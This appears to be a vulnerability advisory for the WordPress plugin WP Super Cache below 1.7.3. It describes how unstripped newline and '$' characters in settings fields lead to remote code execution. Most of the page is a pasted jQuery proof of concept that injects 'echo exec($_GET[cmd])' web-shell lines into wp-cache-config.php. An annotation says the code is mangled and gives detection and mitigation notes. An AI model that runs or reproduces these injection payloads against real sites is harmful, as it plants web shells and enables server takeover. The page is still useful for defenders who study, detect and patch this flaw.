The plugin-settings parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time and $cached_direct_pages lead to remote code execution (RCE) because their values are accepted with “$” and “\n” characters left in place. This is due to an incomplete fix of CVE-2021-24209. The injected command is then executed by requesting “https://target/wp-content/wp-cache-config.php” directly. Versions earlier than 1.7.3 are affected (see the version table below).
// Proof-of-concept as pasted on the page. It is not runnable in this form: the page's
// formatting replaced quotes with curly quotes, turned "&tab=" into the "&tab;=" entity and
// broke the multi-line string literals. The code is kept byte-identical; notes for defenders:
//  - Every request first GETs the plugin settings page and extracts `_wpnonce` from it, so
//    it runs only inside an already-authenticated session that can reach that page
//    (presumably an administrator); the issue is post-auth settings -> RCE, not pre-auth.
//  - The injected values carry a newline followed by a "$"-prefixed config variable name,
//    i.e. the unstripped characters described above (incomplete fix of CVE-2021-24209).
//  - Each variant immediately re-posts a benign value ("./", "1", "00:00"), so the settings
//    UI may look normal afterwards; inspect wp-content/wp-cache-config.php itself, not just
//    the stored options.
//  - Detection: POSTs to options-general.php?page=wpsupercache whose wp_cache_location,
//    wp_cache_debug_ip, wp_super_cache_front_page_text, cache_scheduled_time or
//    new_direct_page fields contain a newline or "$", and unexpected writes to
//    wp-content/wp-cache-config.php.
//  - Mitigation: update wp-super-cache to 1.7.3 or later (the version table below lists
//    versions below 1.7.3 as affected).
//Exploit $cache_path url = ‘http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “/tmp/\n$cache_path\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “./” }) }); console.log(‘EXPLOIT!’); }); //Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=debug’; jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#” //“wp_super_cache_front_page_text”: “/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “1” //“wp_super_cache_front_page_text”: “1” }) }); console.log(‘EXPLOIT!’); }); //Exploit $cache_scheduled_time + $cached_direct_pages url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “wp_cache_enabled”: “1”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1] }) console.log(‘SET1!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “\n:00", "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1], "new_direct_page":"
;echo$_GET[cmd]
;#” }) }).then(()=>{ console.log(‘EXPLOIT!’); jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “00:00”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “new_direct_page”:“;echo
$_GET[cmd]`;#” }) }) }); console.log(‘SET2!’); });
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wp-super-cache | lt | 1.7.3 |